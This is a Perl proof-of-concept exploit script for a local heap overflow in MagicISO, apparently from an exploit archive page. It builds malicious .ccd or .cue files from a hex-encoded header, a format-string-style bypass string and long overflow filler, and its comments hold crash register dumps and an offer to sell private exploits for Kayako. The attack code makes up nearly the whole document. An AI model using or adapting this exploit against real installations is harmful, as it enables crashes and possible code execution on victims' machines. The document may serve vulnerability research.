|
#!/usr/bin/perl
#
# MagicISO CCD/Cue Local Heap Overflow Exploit Poc
# ----------------------------------------------------------------
# Mountassif Moad
# Stack ..
# Cyber-Zone ..
#
# Private exploits for Kayako, contact me if anyone want buy it :d
#
# WARNING: Author has no responsibility over the damage done
# Probably impossible to exploit, but who knows? -_-'
# Regiter for ccd
# EAX 44444141
# ECX 45459090
# EDX 90904443
# EBX 4545A094
# ESP 0012F3A0
# EBP 0012F3C4
# ESI 013AE64C
# EDI 013AF650
# EIP 005C04CE MagicISO.005C04CE
# Rgister for cue
# EAX 0012F5D4
# ECX 013B0000
# EDX 013ADDFC ASCII "FILE "999Ax%N%N%N%N%N%N%N08495d565ef66e7dff9f98764daAAAAAAAAAAAAAA...."
# EBX 00001241 EBc overwrited 41
# ESP 0012F4D8
# EBP 0012F4E4
# ESI 00001200
# EDI 00000000
# EIP 0047FE91 MagicISO.0047FE91
# Crash
sub help {print "[!] usage : \n perl $0 .cpp \n perl $0 .cue \n " ;exit();}
&help
unless $ARGV[0];
my $xpl = $ARGV[0];
my $header =
"\x5B\x43\x6C\x6F\x6E\x65\x43\x44\x5D\x0D\x0A\x56\x65\x72\x73\x69".
"\x6F\x6E\x3D\x33\x0D\x0A\x5B\x44\x69\x73\x63\x5D\x0D\x0A\x54\x6F".
"\x63\x45\x6E\x74\x72\x69\x65\x73\x3D\x34\x0D\x0A\x53\x65\x73\x73".
"\x69\x6F\x6E\x73\x3D\x31\x0D\x0A\x44\x61\x74\x61\x54\x72\x61\x63".
"\x6B\x73\x53\x63\x72\x61\x6D\x62\x6C\x65\x64\x3D\x30\x0D\x0A\x43".
"\x44\x54\x65\x78\x74\x4C\x65\x6E\x67\x74\x68\x3D\x30\x0D\x0A\x5B".
"\x53\x65\x73\x73\x69\x6F\x6E\x20\x31\x5D\x0D\x0A\x50\x72\x65\x47".
"\x61\x70\x4D\x6F\x64\x65\x3D\x31\x0D\x0A\x50\x72\x65\x47\x61\x70".
"\x53\x75\x62\x43\x3D\x30\x0D\x0A\x5B\x45\x6E\x74\x72\x79\x20\x30".
"\x5D\x0D\x0A\x53\x65\x73\x73\x69\x6F\x6E\x3D\x31\x0D\x0A\x50\x6F".
"\x69\x6E\x74\x3D\x30\x78\x61\x30\x0D\x0A\x41\x44\x52\x3D\x30\x78".
"\x30\x31\x0D\x0A\x43\x6F\x6E\x74\x72\x6F\x6C\x3D\x30\x78\x30\x34".
"\x0D\x0A\x54\x72\x61\x63\x6B\x4E\x6F\x3D\x30\x0D\x0A\x41\x4D\x69".
"\x6E\x3D\x30\x0D\x0A\x41\x53\x65\x63\x3D\x30\x0D\x0A\x41\x46\x72".
"\x61\x6D\x65\x3D\x30\x0D\x0A\x41\x4C\x42\x41\x3D\x2D\x31\x35\x30".
"\x0D\x0A\x5A\x65\x72\x6F\x3D\x30\x0D\x0A\x50\x4D\x69\x6E\x3D\x31".
"\x0D\x0A\x50\x53\x65\x63\x3D\x30\x0D\x0A\x50\x46\x72\x61\x6D\x65".
"\x3D\x30\x0D\x0A\x50\x4C\x42\x41\x3D\x34\x33\x35\x30\x0D\x0A\x5B".
"\x45\x6E\x74\x72\x79\x20\x31\x5D\x0D\x0A\x53\x65\x73\x73\x69\x6F".
"\x6E\x3D\x31\x0D\x0A\x50\x6F\x69\x6E\x74\x3D\x30\x78\x61\x31\x0D".
"\x0A\x41\x44\x52\x3D\x30\x78\x30\x31\x0D\x0A\x43\x6F\x6E\x74\x72".
"\x6F\x6C\x3D\x30\x78\x30\x34\x0D\x0A\x54\x72\x61\x63\x6B\x4E\x6F".
"\x3D\x30\x0D\x0A\x41\x4D\x69\x6E\x3D\x30\x0D\x0A\x41\x53\x65\x63".
"\x3D\x30\x0D\x0A\x41\x46\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x41\x4C".
"\x42\x41\x3D\x2D\x31\x35\x30\x0D\x0A\x5A\x65\x72\x6F\x3D\x30\x0D".
"\x0A\x50\x4D\x69\x6E\x3D\x31\x0D\x0A\x50\x53\x65\x63\x3D\x30\x0D".
"\x0A\x50\x46\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x50\x4C\x42\x41\x3D".
"\x34\x33\x35\x30\x0D\x0A\x5B\x45\x6E\x74\x72\x79\x20\x32\x5D\x0D".
"\x0A\x53\x65\x73\x73\x69\x6F\x6E\x3D\x31\x0D\x0A\x50\x6F\x69\x6E".
"\x74\x3D\x30\x78\x61\x32\x0D\x0A\x41\x44\x52\x3D\x30\x78\x30\x31".
"\x0D\x0A\x43\x6F\x6E\x74\x72\x6F\x6C\x3D\x30\x78\x30\x34\x0D\x0A".
"\x54\x72\x61\x63\x6B\x4E\x6F\x3D\x30\x0D\x0A\x41\x4D\x69\x6E\x3D".
"\x30\x0D\x0A\x41\x53\x65\x63\x3D\x30\x0D\x0A\x41\x46\x72\x61\x6D".
"\x65\x3D\x30\x0D\x0A\x41\x4C\x42\x41\x3D\x2D\x31\x35\x30\x0D\x0A".
"\x5A\x65\x72\x6F\x3D\x30\x0D\x0A\x50\x4D\x69\x6E\x3D\x30\x0D\x0A".
"\x50\x53\x65\x63\x3D\x32\x0D\x0A\x50\x46\x72\x61\x6D\x65\x3D\x33".
"\x34\x0D\x0A\x50\x4C\x42\x41\x3D\x33\x34\x0D\x0A\x5B\x45\x6E\x74".
"\x72\x79\x20\x33\x5D\x0D\x0A\x53\x65\x73\x73\x69\x6F\x6E\x3D\x31".
"\x0D\x0A\x50\x6F\x69\x6E\x74\x3D\x30\x78\x30\x31\x0D\x0A\x41\x44".
"\x52\x3D\x30\x78\x30\x31\x0D\x0A\x43\x6F\x6E\x74\x72\x6F\x6C\x3D".
"\x30\x78\x30\x34\x0D\x0A\x54\x72\x61\x63\x6B\x4E\x6F\x3D\x30\x0D".
"\x0A\x41\x4D\x69\x6E\x3D\x30\x0D\x0A\x41\x53\x65\x63\x3D\x30\x0D".
"\x0A\x41\x46\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x41\x4C\x42\x41\x3D".
"\x2D\x31\x35\x30\x0D\x0A\x5A\x65\x72\x6F\x3D\x30\x0D\x0A\x50\x4D".
"\x69\x6E\x3D\x30\x0D\x0A\x50\x53\x65\x63\x3D\x32\x0D\x0A\x50\x46".
"\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x50\x4C\x42\x41\x3D\x30\x0D\x0A".
"\x5B\x54\x52\x41\x43\x4B\x20\x31\x5D\x0D\x0A\x4D\x4F\x44\x45\x3D".
"\x31\x0D\x0A\x49\x4E\x44\x45\x58\x20\x31\x3D\x39\x39\x39";
my $header1=
"\x46\x49\x4c\x45\x20\x22";
my $header2=
"\x2e\x42\x49\x4e\x22\x20\x42\x49\x4e\x41\x52\x59\x0d\x0a\x20".
"\x54\x52\x41\x43\x4b\x20\x30\x31\x20\x4d\x4f\x44\x45\x31\x2f\x32".
"\x33\x35\x32\x0d\x0a\x20\x20\x20\x49\x4e\x44\x45\x58\x20\x30\x31".
"\x20\x30\x30\x3a\x30\x30\x3a\x30\x30";
my $bypass=
"\x39\x39\x39\x41\x78\x25\x4e\x25\x4e\x25\x4e\x25\x4e\x25\x4e\x25".
"\x4e\x25\x4e\x25\x4e\x25\x4e\x25\x4e\x25\x4e\x25\x25\x4e\x25\x4e".
"\x25\x4e\x25\x4e\x41\x63\x66\x63\x64\x32\x30\x38\x34\x39\x35\x64".
"\x35\x36\x35\x65\x66\x36\x36\x65\x37\x64\x66\x66\x39\x66\x39\x38".
"\x37\x36\x34\x64\x61\x63\x34\x63\x61\x34\x32\x33\x38\x61\x30";
my $edx = "\x43\x43\x43\x43";
my $Bof = "\x41" x 4004;
my $eax = "\x44\x44\x44\x44";
my $Nop = "\x90" x 4;
my $ecx = "\x45\x45\x45\x45";
my $Sop = "\x91" x 20;
my $Hof = "\x46" x 5000;
if ($xpl eq '.ccd')
{open(file,'>Exploit.ccd');print file $header.$bypass.$edx.$Bof.$eax.$Nop.$ecx.$Sop.$Hof;close(file);print "[!] Done \n";}
elsif ($xpl eq '.cue')
{open(file,'>Exploit.cue');print file $header1.$bypass.$edx.$Bof.$eax.$Nop.$ecx.$Sop.$Hof.$header2;close(file);print "[!] Done \n"}
else {&help}
|
推荐
评论(0条)
